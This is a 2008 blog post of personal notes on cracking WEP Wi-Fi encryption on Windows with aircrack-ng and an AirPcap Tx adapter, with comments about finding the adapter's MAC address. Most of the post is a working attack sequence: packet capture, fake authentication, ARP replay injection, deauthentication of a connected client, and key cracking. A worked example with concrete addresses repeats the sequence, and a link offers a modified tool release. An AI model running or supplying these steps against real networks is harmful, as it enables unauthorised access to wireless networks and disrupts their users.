Notes: Cracking WEP on the Windows command line with Aircrack-ng and AirPcap Tx

ARP injection in Windows using AirPcap Tx

Finally, I’ve had time to write down my notes on using aircrack-ng with the AirPcap Tx adapter in Windows. Before you read on, please be aware that this isn’t meant to be a guide or tutorial; it’s just my notes. Thanky :)

Basics

Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00

Start attack:

aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00

Deauth (if we need ARPs):

aireplay-ng --deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00

Start cracking:

aircrack-ng -z mycapturefile.cap

Worked example:

airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap

Download

I’ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests, appears to perform better.

Download the release of aircrack-ng for AirPcap Tx

2 Comments

  1. Vic said,

    19 January, 2008 at 3:08 pm

    How do I find the MAC address of the AirPcap Tx USB adapter? It doesn’t show in ipconfig…

  2. Phil Wiffen said,

    21 January, 2008 at 10:38 pm

    Vic: it’s written on the adapter itself. Usually where the sticky label is :) It doesn’t show up in ipconfig because, technically, it’s not a “real” Windows network adapter.

Creative Commons Attribution-ShareAlike 2.0 UK: England & Wales